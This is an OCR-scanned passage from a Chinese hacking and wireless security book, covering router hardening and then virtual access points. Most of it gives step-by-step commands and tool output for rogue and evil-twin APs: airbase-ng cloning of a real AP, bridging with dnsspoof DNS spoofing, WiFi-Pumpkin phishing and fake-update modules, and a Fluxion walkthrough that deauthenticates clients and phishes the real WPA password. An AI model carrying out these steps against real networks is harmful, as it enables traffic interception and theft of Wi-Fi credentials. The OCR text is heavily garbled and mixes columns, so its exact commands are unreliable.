主机 的 MAC 地 址 管理 无 线路 由 器 。 

(8) 关闭 DHCP 服务 。 这 样 即便 密码 
泄露 ， 大 部 分 的 黑客 也 无 法 获取 IP 地 址 。 

(9) 关闭 WPS 功能 。 这 个 非常 重要 ， 
因为 当前 大 部 分 的 密码 都 是 黑客 通过 WPS 
漏洞 ， 找 出 PIN 码 来 暴力 破解 的 。 由 于 这 
个 漏洞， 无 论 用 户 的 无 线 密码 有 多 长 多 复 
杂 ， 通 过 PIN 码 都 可 以 破解 。 

(10) 关闭 UPnP， 对 于 那些 无 用 的 服 
务 ， 建 议 用 户 直 接 关 掉 。 

(11) 关闭 无 线 中 继 /桥接 功能 (WDS) 。 
如 果 发 现 被 无 故 开启， 说 明 这 人 台 路 由 器 很 
有 可 能 已 经 被 黑客 控制 了 。 

(12) 关闭 SSID 广播 ， 关 闭 之 后 ， 大 
部 分 人 会 搜索 不 到 路 由 器 设备 ， 这 样 就 可 
以 自己 独 享 网 络 了 这 在 一 定 程度 上 起 到 了 
隐身 作用 。 
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(13) 开启 防 DDoS 功 能 。 这 是 因为 黑 打开 “运行 ”对 话 框 ， 在 其 中 输入 
客 会 通过 DDoS 流量 进行 攻击 ，10s 左 右 ， 用 ， 单 击 “ 确 定 ” 按 钮 ， 如 下 图 
户 的 路 由 器 就 会 自动 将 大 部 分 人 踢 下 线 ， ”所 示 。 

还 会 出 现 抖 动 状态 。 

(14) 开局 用 户 隔离 功能 。 这 样 即便 
密码 被 破解 ， 黑 客 也 没 法 搜索 到 设备 ， 这 | 加 wp emome 
是 因为 黑客 与 用 户 不 在 同一 个 局 域 网 内 。 mo 恩 - 一 
这 对 保护 局 域 网 的 安全 非常 有 用 。 0 

(15) 采用 增强 认证 。 采 用 8021x 或 者 
Web 认 证 来 进行 账户 和 密码 登录 ， 这 在 一 定 
程度 上 提高 了 无 线 网 络 的 安全 性 。 


取消 浏览 (B).. 


_ [step 国 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 
9.2 手动 创 | 建 AP 入 netsh wlan show drivers 人 命令， 检查 无 线 网 


卡 是 否 支持 AP 功能 ， 如 果 有 “支持 的 承载 
对 于 虚拟 AP 的 创建 ， 用 户 可 以 采用 手 网 络 : 是 ”信息 ， 证 明 具 有 AP 功 能 ， 如 下 


动 来 创建 ， 下 面 介 绍 在 Windows 与 Linux 两 
种 系统 下 手动 创建 AP 的 方法 。 
册 油 昌 9.2.1 在 Windows10 系 统 下 创建 Ap es ee 


ET 2 
Tr alink 


i Windows10 系 统 自 带 了 设置 网 络 共 享 提 \ i 4 a a 
的 功能 ， 可 以 通过 以 下 步骤 设置 一 个 虚拟 二 各 育 


002. llb 50<. 11g 802,11n 


AP。 具 体操 作 步 又 如 下 : 

[sep 回 右 击 桌面 上 的 “开始 ”按钮 ， 在 弹出 
的 菜单 列表 中 选择 “运行 ”菜单 命令 ， 如 
下 图 所 示 。 


人 党 大 区 各 使 用 netsh wlan set hostednetwork 


sa mode=allow ssid 一 WiFi key=12345678 命 令 


运行 (RJ 


创建 一 个 无 线 AP， 该 命令 用 于 创建 一 个 名 
称 为 WiFi、 连 接客 码 为 12345$678 的 无 线 网 
络 ， 如 下 图 所 示 。 


关机 或 注 饥 [U) 


:\Users\Admnistrator>netsh wlan set hostednetwork mode=allow ssid=wifi key=1234567 
F 和 


使 用 netsh wlan start hostednetwork 命 令 ， 启 用 创建 好 的 无 线 网 络 ， 如 下 图 所 示 。 
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打开 “设置 ”对 话 框 ， 在 其 中 选择 
“网 络 和 Internet” 选 项 ， 如 下 图 所 示 。 


pe 
量 示 器 、 声 音 、 通 知 、 串 源 


网 络 和 Internet 个 性 化 
WLAN、 飞 行 模 式 、VPN 背景 、 钢 屏 、 颜 色 


二 应 用 帐户 
抒 载 、 默 认 应 用 、 可 选 功能 你 的 帐户 、 电 子 邮 件 、 同 步 设 
置 、 工 作 、 其 他 人 员 


时 间 和 语言 


游戏 
语音 、 区 域 、 日 期 游戏 栏 、 抚 获 、 广 播 、 游 戏 模 式 


打开 “网 络 状 态 ” 对 话 框 ， 单 击 左下 
方 的 “网 络 和 共享 中 心 ” 超 链接 ， 如 下 图 
所 示 。 
八 网 络 疑 难 解 答 
诊断 并 解决 网 络 问 题 。 
查看 网 络 属性 
Windows 防火 墙 


网 络 和 共 字 中 心 


网 络 主导 


[Seg 国 打开 “网 络 和 共享 中 心 ”对 话 框 ， 单 
去 左上 方 的 “更 改 适配器 设置 ” 超 链接 ， 
如 下 图 所 示 。 


控制 面板 主页 


ET Ta 三 


更 改 高 级 共享 设置 
媒体 并 式 处 翰 先 项 


step 图 打开 “网 络 连接 ”对 话 框 ， 在 其 中 可 
以 看 到 多 出 来 的 “本 地 连接 *3” 图 标 ， 如 
下 图 所 示 。 


第 9 章 “无线 网 络 中 的 虚拟 AP 技术 一 


™ VMware Network Adapter 
VMnet8 “未 连接 


| ll 802.11n USB Wireless LAN Card 


mm | 以 太 网 2 
有 
Realtek pCle GBE Family Contr... 


选择 接 入 外 网 的 网 络 图 标 ， 这 里 以 
“以 太 网 2” 有 线 网 络 为 例 演示 ， 选 中 以 太 
网 2 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “ 属 
性 ”菜单 命令 ， 如 下 图 所 示 。 

息 禁用 (8) 


状态 (U) 
诊断 (I) 


昌 桥接 (G) 


创建 快捷 方式 (9) 
昌 型 2(D) 
昌 重 命 名 (M) 


多 尾 性 (R) 区 


打开 “属性 ”对 话 框 ， 切 换 到 “ 共 
享 ” 选项 卡 ， 在 “家 庭 网 络 连接 ”下 拉 列 
表 中 找到 “本 地 连接 *3” 并 选中 ， 如 下 图 
所 示 。 


VirtualBox Host-Only Network 
VirtualBox Host-Only Network #2 
VMware Network Adapter VIMnet1 
VMware Network Adapter VMnet8 
WLAN 


[step 图 选择 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 这 
样 便 可 以 创建 一 个 虚拟 AP， 如 下 图 所 示 。 


网 阁 | 共享 


Internet 连 尝 共 邓 


回 爷 秆 其 他 网 络 用 户 通 过 此 计算 机 的 Internet 笑 接 来 连接 (N) 


家 庭 网 络 连 接 (H]: 
本 地 连接 + 3 


回 允许 其 他 网 络 用 户 控制 或 禁用 共享 的 Internet 连接 (O) 


医 二 本 
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虚拟 AP 最 直接 的 方法 就 是 手动 虚拟 


”AP 地 址 ， 手 动 配置 虚拟 AP 的 具体 操作 步 


又 如 下 : 
通过 airbase-ng -c 1 -e Test-002 
wlan0mon 命 令 ， 便 可 以 虚拟 一 个 AP， 如 下 
图 所 示 。 


root@kali:~# airbase-ng -C 1 -e Test-002 WwWLangmon 

04:55:40 Created tap interface atg 

94:55:40 Trying to set MTU on at9 to 1500 

04:55:40 Trying to set MTU on wlanQmon to 1800 

04:55:40 Access Point with 3SSID E8:4E:06:28:AE:46 started. 


通过 ifconfig -a 命令 可 以 看 到 多 出 一 块 
at0 的 网 卡 ， 如 下 图 所 示 。 


root@kali:-~# ifconfig -a 
at9: flags=4098<BROADCAST,MULTICAST> mtu 1500 
ether e8:4e:06:28:ae:46 txqueuelen 1990 [Ethernet) 
RX packets © bytes 9 (0.9 B) 
RX errors a dropped 9 overruns © frame 0 
TX packets © bytes 9 (0.0 B) 
TX errors © dropped 0 overruns 9 carrier 0 collisions 0 


通过 airodump-ng wlan0mon 命 令 监 
听 附 近 AP， 可 以 看 到 已 经 有 Test-002 这 样 
一 个 AP， 并 且 此 时 处 于 OPN 状 态 ， 如 下 图 
所 示 。 


cH 5 ][ Elapsed: 6 s ][ 2618-190-26 95:62 

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ES5SID 
B86:;88;5E:;gA;16;91] -53 9 日 8 1 139 OPN 智 芋 硅 电 
E4:68:A3:7C:B1:B2 -36 9 [a] a 6 S54e. OPN CMCC-X] 
E4:68:A3:7C:B1:BB -37 1 日 [2 6 Sd4e, WPA2 CCMP MGT CMCC 
E4:68:A3:7C:45:F2 -45 9 4 8 56 -1 OPN <length: gg> 
F4:83:CD:33:60:73 -1 2 1 8 6 4685 WPA2 CCMP PSK 于 谷 科技 
E4:68:A3:7C:B1:B5 -356 1 日 © 6 S54e, OPN 久 
E8:4E:66:28:AE:456 9 135 日 a 5 54 OPN Test-662 
B6:;83;CD;33:;60;73 -5 2 日 [9 56 485 OPN TPGuest 6073 
1C:FA:68:01:2F:98 -23 和 44 日 © 1 136 WPA2 CCMP PSK Test-991 


(多 提示 : 可 以 使 用 airbase-ng -a < 真实 AP- 
MAC 地 址 > --essid < 真实 AP 的 名 称 > wlan- 
0mon 命 令 ， 完 全 模仿 一 个 真实 AP， 此 时 进 
行 监 听 便 不 能 区 分 真实 AP 与 伪 AP， 如 果 伪 
AP 再 增 大 发 射频 率 便 会 履 盖 真实 AP。 


使 用 apt-get install bridge-utils 命 令 ， 
安装 一 个 网 桥 工 具 ， 如 下 图 所 示 。 


root@kali:-# apt-get instaltl bridge-utils 
在 读 取 软件 包 列 表 ... 完成 
在 分 析 软 件 包 的 依 琅 关系 树 
在 读 取 状态 信息 ... 充 成 
列 软 件 包 是 自动 安装 的 井 且 现在 不 需要 了 : 
libx265-168 python-backports.ssl-match-hostname python-beautifulsoup 


ruby-terminal-table ruby-unicode-dispLay-width 

司 用 'apt autoremove' 来 部 载 它 [( 它 们 )。 

下 列 【 新 ]】 软件 包 和 将 被 安装 : 

bridge-utils 

峙 级 了 6 个 软件 包 ， 新 安装 了 1 个 软件 包 ,， 受 部 载 8 个 软 忻 包 ， 有 98 个 软件 包 未 被 升级 。 


使 用 brctl addbr bridge 命 令 ， 添 加 一 
个 桥接 接口 ， 并 使 用 ifconfig -a 命令 查看 
接口 ， 如 下 图 所 示 ， 添 加 一 个 新 的 桥接 
接口 。 
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FootaKkali:~# 1TCONTIg -a 
bridge: flags=4098<BROADCAST,MULTICAST> mtu 1560 
ether fa:ea:10:81:db:11 txqueuelen 1006 (Ethernet) 
RX packets 9 bytes 9 (6.9 B) 
RX errors © dropped 0 overruns © frame 0 
TX packets D bytes 9 (0.0 B) 
TX errors 9 dropped 0 overruns 6 carrier 9 collisions 0 


执行 brctl addif bridge eth0 命 令 和 brctl 
addif bridge at0 命 令 ， 将 eth0 网 卡 和 at0 网 
卡 加 入 到 桥接 中 ， 分 别 将 其 IP 地 址 配置 为 
0.0.0.0 并 局 动 起 来 ， 如 下 图 所 示 。 


root@kali:-~# brctl addif bridge ethg 
root@kali:~# brctl addif bridge atg9 

root@kali:~# Ifconfig ethg 0.0.0.0 up 
root@kali:~# ifconfig at9 0.0.0.0 up 


执行 ifconfig bridge <ip 地 址 > up 命 
令 ， 将 桥接 网 口 启动 ， 如 下 图 所 示 ， 这 里 
的 JP 地 址 根据 自己 的 网 络 进行 设置 ， 设置 的 
是 192.168.157.100。 


root@kali:~# ifconfig 

at9: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1580 

inets fe8g: :ead4e:6ff:fe28:ae46 prefixlen 64 scopeid 9x20<Link> 
ether e8:4e:96:28:ae;46 txqueuelen 196996 [Ethernet) 

RX packets 8 bytes 0 (0.6 B) 

RX errors 8 dropped © overruns 8 frame 0 

TX packets 58 bytes 13118 (12.8 KiB) 

TX errors BB dropped 9 overruns 6 carrier 6 collisions 日 


bridoe: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1588 
inet 192.1586.157.199 netmask 255.255.255,9 broadcast 192.168,157.255 
Inet6 fe80::20c:29ff:fe39:f29c prefixlen 64 scopeid 9x20<LInk> 
ether 060:0c:29:39:f2:9c txqueuelen 10688 [Ethernet) 
RX packets 48 bytes 11434 [11.1 KiB) 
RX errors B dropped 9 overruns 9 frame 9 
TX packets 19 bytes 796 (796.0 B) 
TX errors B dropped 0 overruns © carrier © collisions 0 


使 用 route add -net 0.0.0.0 netmask 
0.0.0.0 gw 192.168.1.1 命 令 ， 主 机 添加 一 个 
网 关 ， 并 使 用 netstat -nr 命令 查看 网 关 添 加 
情况 ， 如 下 图 所 示 。 


root@kali:-# netstat -nr 

Kernel IP routing table 

Destination Gateway Genmask Flags MSS Window irtt Iface 
B.0.90.0 192.168.1.1 0.0.0.9 UG 9 8 a ethe 
8.0.96.6 192 .168.1.1 8.06.0.8 UG ©0 9 ethe 
192 .168.1.D B.0.0.0 255.255.255.8 U 日 B 9 ethe 
192 .168.157.0 0.0.0.0 255.255.255.8 U 9 8 a bridge 


使 用 echo 1 > /proc/sys/net/ipv4/ip 
forward 命 令 ， 添 加 IP 地 址 转发 功能 ， 如 下 
图 所 示 。 


root@kali:-~# cat /proc/sys/net/ipv4/ip forward 

0 

root@kali:-# echo 1 > /proc/sys/net/ipv4/ip forward 
root@kali:-~# cat /proc/sys/net/ipv4/ip forward 

1 


[step 欧 新建 一 个 文件 ， 文 件 格式 为 : IP 地 址 
< 空格 > 域名 ， 如 下 图 所 示 。 


文件 (F) 编辑 (E) 查看 (V) 搜索 (S) 
127.0.0.1 www.baidu.com 


使 用 dnsspoof -i bridge -f hosts 命 令 ， 


将 文件 中 的 JP 域名 对 应 关系 进行 解析 ， 如 下 
图 所 示 。 下 图 中 可 以 看 到 ， 在 本 机 开启 了 
53 端 口 进行 DNS 解 析 ， 而 解析 的 规则 则 是 
按照 之 前 做 好 的 配置 文件 来 进行 。 


root@kali:-~# dnsspoof -i bridge -f hosts 
dnsspoof: listening on bridge [udp dst port 53 and not src 192.168.157.100] 


9.3 ”使 用 WiFi-Pumpkin 虚 
拟 AP 


WiFi-Pumpkin 是 一 款 图 形 化 工具 ， 它 
并 不 是 Kali 目 带 的 工具 ， 通 过 它 可 以 轻松 实 
现 虚拟 AP、 移 动 WiFi 等 功能 。 


9.3.1 安装 WiFi-Pumpkin 


由 于 WiFi-Pumpkin 是 扩展 工具 ， 因 此 

需要 下 载 。 下 载 并 安装 WiFi-Pumpkin 工 具 
的 操作 步骤 如 下 : 
使 用 git clone https://github.com/ 
POcL4bs/WiFi-Pumpkin.git 命 令 ， 从 github 上 
复制 代码 到 本 机 ， 或 者 直接 从 github 上 下 载 
安装 包 ， 如 下 图 所 示 。 


Find file 


Clone or downioad ” 


Clone with HTTPS GO) 
Use Grt or checkout with SVN using the web URL. 


https://github.com/POcL4bs/WiFi-Pumpkin.; | 良 


Download ZIP 


Open in Desktop 


单 击 Download ZIP 按 钮 ， 可 以 下 载 安 
装 包 。 下 图 为 下 载 后 的 安装 包 。 


WiFi-Pumpkin- 
master.zip 


WiFi-Pumpkin- 
master 


[step 图 解压 安装 包 后 查看 安装 包 文 件 ， 如 
下 图 所 示 。 至 此 便 完 成 了 WiFi-Pumpkin 的 
下 载 。 
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rootEkali:~/UDownLoads/WiFi-Pumpkin-master# Ts 
HANGELOG installer.sh modules 
DNTRIBUTING.md ISSUE TEMPLATE.md plugins 


wifi-pumpkin 
wifi-pumpkin.desktop 


core LICENSE README .md Wifi-pumpkin.py 
ocs logs requirements ,txt 
icons make_deb.sh templates 


使 用 ./installer.sh --install 命 令 安 装 软 
a 运行 效果 如 下 图 所 示 。 


Version: 0.8.5 

usage: ./installer.sh --install | --uninstall 
命中 :1 http://mirrors.neusoft.edu.cn/kali kali-rolling InReteasg 
正在 读 取 软件 包 列 表 . 完成 

在 读 取 软件 包 列 表 . . 完成 

在 分 析 软 件 包 的 依 闲 关系 树 

在 读 取 状态 信息 ... 完成 

jbffi-dev 已 经 是 最 新 版 (3.2.1-8). 
ibffi-dev 已 设置 为 手动 安装 。 
ython-pip 已 经 是 最 新 版 (9.9.1-2.3)。 
ython-pip 已 设置 为 手动 安装 。 


安装 过 程 WiFi-Pumpkin 会 自动 查看 依 
赖 包 ， 如 果 存 在 缺少 的 依赖 包 ， 会 自动 下 
载 并 安装 相关 的 依赖 包 ， 如 下 图 所 示 。 


且 会 同时 安装 下 列 软件 : 

girl.2-harfbuzz-0.90 icu-devtools libglib2.0-dev LibgLib2.0-dev-bin 
libgraphite2-dev Libharfbuzz-dev libharfbuzz-gobjecte Libicu-dev 
libicu-le-hb-dev libpcre16-3 libpcre3-dev libpcre32-3 libpcrecppevs5s 
pkg-config 

建议 安装 : 

LibgLib2.9-doc libgraphite2-utils icu-doc libssl-doc 

上 下列 【 新 】 软 件 包 将 被 安装 : 

girl.2-harfbuzz-0.90 icu-devtools libglib2.0-dev libglib2.6-dev-bin 
libgraphite2-dev Libharfbuzz-dev libharfbuzz-gobjecte Libicu-dev 
libicu-le-hb-dev libpcre16-3 libpcre3-dev libpcre32-3 libpcrecppBevs 
libssl-dev libxml2-dev libxsltl-dev pkg-config 21liblg-dev 


安装 完成 后 的 结果 如 下 图 所 示 ， 这 里 
给 出 了 相应 的 提示 oO 


[=] checking dependencies 
----[x*]----[+] hostapd Installed 


一 一 


[+] Distribution Name: Kali 

[=] InstaLL WiFi-Pumpkin 

[v] binary::/usr/bin/ 

[v] wifi-pumpkin installed with success 
[v] execute sudo wifi-pumpkin in terminal 
[+] P6cL4bs Team CopyRight 2015-2917 


[+] Enjoy 


9.3.2 ”开始 虚拟 AP 


WiFi-Pumpkin 配 置 完成 后 ， 下 面 就 可 
以 虚拟 AP 了 。 上 有 具体 的 操作 步骤 如 下 : 
单 击 Settings 选 项 卡 可 以 切换 到 设置 
页 面 ， 如 果 创 建 一 个 虚拟 AP 可 以 通过 设置 
Access Point 来 完成 ， 填 入 SSID 的 名 称 、 
BSSID 的 MAC 地 址 (这 里 可 以 随机 也 可 
以 自行 设置 ) 、AP 信 道 、 无 线 网 卡 〈 可 
以 通过 Refresh 按 钮 来 刷新 获取 ) ， 如 下 图 
所 示 。 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


下 方 可 以 设置 DHCP 服 务 ， 分 配 IP 


Be settings 按 钮 ， 如 下 图 所 示 。 在 Tools 荣 单列 表 下 有 一 个 ActiveDrift- 


Net 工 具 。 用 于 查看 连接 设备 传输 过 程 中 的 
图 片 信息 ， 如 下 图 所 示 。 


下 图 为 ActiveDriftNet 抓 取 的 图 片 
信息 。 


driftnet 口 


此 时 的 WiFi-Pumpkin 是 一 个 未 运行 状 
态 ;如 下 图 所 示 o 


当 所 有 都 设置 完成 后 ， 直 接 年 另外 ， 在 Image-Cap 中 也 可 以 抓 取 图 片 
击 start 按 钮 启动 WiFi-Pumpki， 如 下 图 信息 ， 如 下 图 所 示 
所 示 。 5 » 全 人 No 


实现 数据 监听 ， 此 时 WiFi 列 表 中 会 
多 出 一 个 刚才 设置 的 无 线 ESSID， 使 用 手 
机 接 入 ， 浏 览 网 页 的 数据 可 以 通过 WiFi- 
Pumpkin 查 看 ， 如 下 图 所 示 ， 这 样 便 可 以 抓 
取 流 经 AP 的 所 有 数据 包 。 


Server 菜 单 中 有 两 个 选项 ， 一 个 是 


Phishing Manager， 一 个 是 Windows Up- 


eagle ns odinle nana torieomdty date， 如 下 图 所 示 。 
如 果 需 要 使 用 移动 WiFi， 在 Setting 界 面 
中 选中 Enable Wireless Security 选 项 。 这 里 
可 以 选择 加 密 方式 以 及 共享 密 钥 ， 如 下 图 


1>0 


其 中 Phishing Manager 可 以 用 于 模拟 一 
个 网 页 ， 可 以 从 这 里 虚假 页 面 达到 钓鱼 效 
宋 ， 如 下 图 所 示 。 


Phishing Manager © O09 


er OO 


Windows Update 则 模拟 一 个 类 似 Win- 
dows 更 新 程序 或 Java 更 新 程序 ， 回 客户 端 发 
送 数据 包 ， 如 下 图 所 示 。 


Windows Update Attack Generator © 日 四 


Modules 菜 单 中 包括 五 个 模块 ， 它 们 分 
别 是 WiFi deauthentication 〈 用 户 断 开 客 户 端 
与 AP 连接 ) 、WiFi Probe Request 〈 用 于 发 
现 AP) 、DHCP Starvation 〈 实 现 DHCP 饥 饿 
攻击 ) 、ARP Poisoner 〈 实 现 ARP 攻 击 ) 以 
及 DNS spoofer( 实 现 DNS 欺 骗 ) ， 如 下 图 
所 示 。 
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e WiFi deauthentication: 这 里 可 以 选 
择 一 个 目标 AP 通过 发 送 断 开 连 接 请 
求 ， 中 断 STA 与 AP 的 连接 ， 从 而 抓 
取 握 手 信息 ， 如 下 图 所 示 。 


Wireless Deauthentication Attack ©@ @ @ 


e@ WiFi Probe Request: 用 于 发 现 AP， 
通过 该 模块 可 以 扫描 附近 的 AP， 如 
下 图 所 示 。 


Probe RequestwifiMonitor 口上 


e DHCP Starvation: 用 于 实现 DHCP 饥 
饿 攻击 ， 一 旦 启动 迅速 占 满 DHCP 
所 分 配 的 也， 如 下 图 所 示 。 


Dhcp Starvation Attack © 
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e ARP Poisoner: 可 以 扫描 网 段 中 密码， 从 而 获取 无 线 密 码 。 使 用 Fluxion 工 
的 客户 机 ， 通 过 模拟 实现 ARP 攻 具 虚 拟 AP 的 操作 步 又 如 下 : 


击 ， 如 下 图 所 示 。 使 用 git clone https://github.com/w1i-fi- 
ARP poisoner eoe analyzer/fluxion.git 命 令 ， 从 github 上 复制 代 


码 到 本 机 ， 或 者 直接 从 github 上 下 载 安装 


所， 如 下 图 所 示 。 
Find file Clone or download ~ 


Clone with HTTPS GO) 
Use Grt or checkout with SVN using the web URL. 


https://github.com/wi-fi-analyzer/fluxiol 急 


Open in Desktop Download ZIP 


解压 安装 包 ， 查 看 安装 目录 文件 ， 如 


下 图 所 示 。 
e DNS Spoofer: 可 以 实现 DNS 欺骗 ， 
root@kali:~/Downloads/fluxion-master# ls 


其 中 9] 以 设置 需 要 其 骗 的 域 4 9 docs install Lib LogosS seoemtter 


区 _ _ _ fluxion.sh language locale README.md sites 
配合 Phishing Manager 与 Windows 


Update 构 建 虚假 页 面 或 者 更 新 程 执行 “./fluxion.s”h 肢 本， 检查 数据 


序 ， 如 下 图 所 示 。 依赖 包 信 息 ， 如 下 图 所 1 二 
DNS Spoofer 一 有 D 旺 > [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ] 
[ ] 
[ FLUXION 2 < Fluxion Is The Future > ] 
[ ] 
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] 
Aircrack-ng..... OK ! 
Bireplay-ng..... OK ! 
Airmon-ng....... OK ! 
airodump-ng..... OK ! 
a OK ! 
| my 司 生 放生 全 全 OK ! 
re OK ! 
Mm La OK! 
1 hE oOoK! 
Wr 二 人 Not installed 
macchanger...... OK ! 
WO OK ! 
站 OK ! 
DID= 世 了 Not installed 
1 9 OK! 
BYythnone. ss ea OK ! 
UNL0R a OK ! 
KEG dai OK ! 
pOenssLe de ea OK ! 
EP rx" [m] A . | 大 用 全 车 OK ! 
pp tp 9.4 使 用 Fluxion 虚 拟 AP Erangg OK ! 
让 加 站 Plseroosoo oe OK 


Fluxion 不 是 Kali 目 带 的 工具 ， 通 过 它 可 切换 到 install 列 表 中 ， 执 行 ./fluxion.s 
以 虚拟 一 个 AP， 以 便 诱惑 客户 问 输 入 登录 。 命令 ， 安 装 Fluxion 软 件 ， 如 下 图 所 示 。 
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MATECTECK=Nnge sa 
Aireplay-ng..... 
ep a 


1 Dt 宁 证 2 
nostaDla ossnese 
LeonTage eeede 
Lonttod ea 
Macchanger...... 
| 
| ' 
Openssl......... 
PmnD=C0lo ea 
a 


有 ， 扩 风 国 
| | rg 1 


i 


| | -| 


再 次 执行 “./fluxion.s”h 脚 本 ， 

主 界面 ， 在 这 里 可 以 选择 语言 ， 如 下 图 所 
示 ， 由 于 该 软件 字体 颜色 偏 白色 所 以 更 换 
为 黑 找 白字 。 


FLUXION 2 < Fluxion Is The Future > 


2] Select your Language 


[1] English 
[2] German 
[3] Romanian 
[4] Turkish 
[5] Spanish 
[6] Chinese 
[7] Italian 
[8] Czech 
[9] Greek 
[10] French 
[11] Slovenian 


eftuxion] - [~] 
选择 1 使 用 英语 ， 进 入 信道 选择 ， 如 
下 图 所 示 。 搜 索 通 信人 信道 ， 如 果 已 知 目标 
的 通信 信道 可 选择 2 指定 信道 ， 不 然 请 选择 
1 全 信道 搜索 。 搜 索 过 程 中 会 打开 一 个 窗 
口 ， 当 扫描 到 所 需 的 WiEFi 信 号 ， 按 Ctrl + C 
键 停 止 打 描 ， 建 议 扫 描 至 少 30s 以 上 。 


FLUXION 2 < Fluxion Is The Future > 


[2] Select channel 


[1] ALL channels 
[2] Specific channel(s) 
[3] Back 


@fluxion]-[~] 
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搜索 到 目标 AP 后 可 以 暂停 ， 
ee 通过 数字 选择 目标 AP。 


如 下 图 


CHAN SECU 
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Test-D01 


Step【 选择 完 AP 后 可 以 进入 虚拟 AP 界面 ， 
如 下 图 所 示 ， 这 里 推荐 使 用 第 1 选项 。 


= Test-BOl / WPA2 
| = 6 
= 70 Mbps 
ID = 1C:FA:68:01:2F:08 (TP-LINK TECHNOLOGIES C0., ,LTD. 


[2] Select Attack Option 
[1] FakeAP - 


[2] FakeAP - 
[3] Back 


Hostapd (Recommended) 
airbase-ng (Slower connection) 


GfLuxion] - [~] 


提示 虚拟 AP 信 ， 


如 下 


息 以 及 保存 文件 路 
下 图 所 示 ， 可 以 直接 按 Enter 键 。 


TD = Test-801 / WPA2 
= 6 
= 76 Mbps 
D = 1C:FA:68:01:2F:08 (TP-LINK TECHNOLOGIES C0.,LTD. 


andshake location (Example: /root/Downloads/fluxion-master.cap) 
ENTER to skip 


step 图 抓 取 握 手 信 息 ， 如 下 图 所 示 。 使 用 第 
全 或 第 2 项 都 可 以 。 
[2] Handshake check 
[1] pyrit 


[2] aircrack-ng (Miss chance) 
[3] Back 


GfLuxion]-[~] 国 


Step 有 选择 与 
如 下 图 所 示 。 


[2] *Capture Handshake* 


第 1 项 ， 会 启动 拒绝 请 求 页 面 ， 


[1] Deauth all 
[2] Deauth all [mdk3] 


[3] Deauth target 
[4] Rescan networks 
[5] Exit 


step 轨 选择 第 1 项 ， 中 断 所 有 与 AP 连接 的 客 
户 端 ， 此 时 会 开启 另外 两 个 窗口 用 于 抓 取 
握 于 信息 AN 9 nr 下 图 所 示 O 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


Capturing data on channel --> 1 © @ 这 里 会 会 3 要 求 仓 创 ] | 建 一 个 Web 页 面 ， 如 下 
CH 1 ][ Elapsed: 30 s ][ 2018-11-04 03:57 ][ WPA handshake: 1C:FA:68:01:2F:08 图 a 示 。 这 个 页 面 是 用 于 诱骗 > 户 端 输入 


BS51D PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSI A A L 
登 孙 黎 码 的 oO 
1C:FA:68:01:2F :08 0 78 170 11 0 1 270 WPA2 CCMP PSK Test 


BSSID STATION PWR Rate Lost Frames Probe 


D = Test-9601 / WPA2 
= 】 
= 76 Mbps 


1C:FA:68:01:2F:08 DLC:B6D:CD:66:FE:CB 0 le- le 392 61 Test-001 


= 1C:FA:68:61:2F:@8 (TP-LINK TECHNOLOGITES C0.,LTD. 


中 和 握手 信息 后 ，Fluxion 界 面 如 下 
加 所 示 o 先 择 第 上 入 ] 项 ， 检查 握手 信息 [2] Select your option 


[i] Web Interface 
[2] Exit 


选择 伪造 页 面 的 语言 ， 如 下 图 所 示 。 


[2] *Capture Handshake* 


Status handshake: 


D = Test-B01 / WPA2 
| 
= 76 Mbps 
) = 1C:FA:68:;61:;2F:88 [TP-LINK TECHNOLOGIES C0.,LTD, 


[1] Check handshake 

[2] Back 

[3] Select another network 
[4] Exit 

#> | | 


[2] Select Login Page 
[1] English [EN6 ] (NEUTRA 


[2] German [GER] (NEUTRA) 
[3] Russian [RUS] (NEUTRA) 


四 验证 通过 后 会 跳 转 到 创建 证 书 界面 [3] -Spanish ~ [Esp] (MEUTRA) 

[6] Port [POR] (NEUTRAL 

OrtUugUesSe 

如 下 图 所 示 。 选择 第 1] 项 创 | 建 一 个 SSL 证 书 , [7] Chinese (NEUTRAI 
选择 语言 后 ，Fluxion 会 构建 一 个 虚拟 
AP 并 且 将 客户 端 连 接 中 断 ， 虚 拟 AP 是 没有 

[1] Create a SSL certificate pF 要 

[2] Search for SSL _ certificate 徐 码 连 接 肖 » 此 时 Fluxion 会 开启 多 个 省 :TF 


[3] Exit 用 于 检测 用 户 接 入 状态 ， 如 下 图 所 示 。 


Certificate invalid or not present, please choice 


+yrrrirry Test-00l 
022:08 


ew [证 ， 二 pa 
寻 [T 玫 助 (H) “; TP-LIM TECHNOLDGIES C0.,LTD, 


Is The Future > E 
刘 CLIENTS DN_INE: 


Documents Downlo 

:~# Cd Pictures/ Attack in progress .. 

:~/Pictures# ls 

:~/Pictures# 吕 1) Choose another network 
2) Exit 


~ 品 


Deauthall [mdk3] Test-001 OOO 


ul a SIH detbdtcdtbB:Fe: ch RADILGS: starting accourting scs5jom 319FIE? 


step 图 此 时 手机 登录 会 跳 转 到 一 个 Web 页 面 提 示 需 要 输入 膨 录 窗 码 ， 如 下 图 所 示 。 这 个 黎 
码 Fluxion 会 向 真实 的 AP 进行 验证 ， 输 入 错误 会 提示 错误 ， 直 到 拿 到 真实 密码 。 


出 错 了 : 您 输入 的 密码 错误 ! 


为 了 您 的 安全 考量 , 请 输入 WPA 密 
码 以 重新 连接 网 络 


输入 您 的 WPA 室 码 : 您 的 无 线 网 络 将 会 在 短 时 间 内 恢复 


获取 到 真实 密码 ， 如 下 图 所 示 。 


Wifi Information 日 四 


[00:00:00] 1/0 keys tested (136.56 ks) 
Time left: 


安 品 


号 总 访 ”全 3 


对 ES ER 
ur rN 


对 ”号 尺 当 全 的 固 


rs 
~ 
只 谭 区 总 刁 合 


人 上 后台 第 品目 则 
三 久 吕 疝 
总 作 吕 加 尽 2 
习 闭 局 恩 。 呆 号 
判 巳 员 四 ” 避 号 
出 测 轩 明月 于 忆 
SS 巴 关 只要 Sa 
9 间 包 员 吕 忆 才 
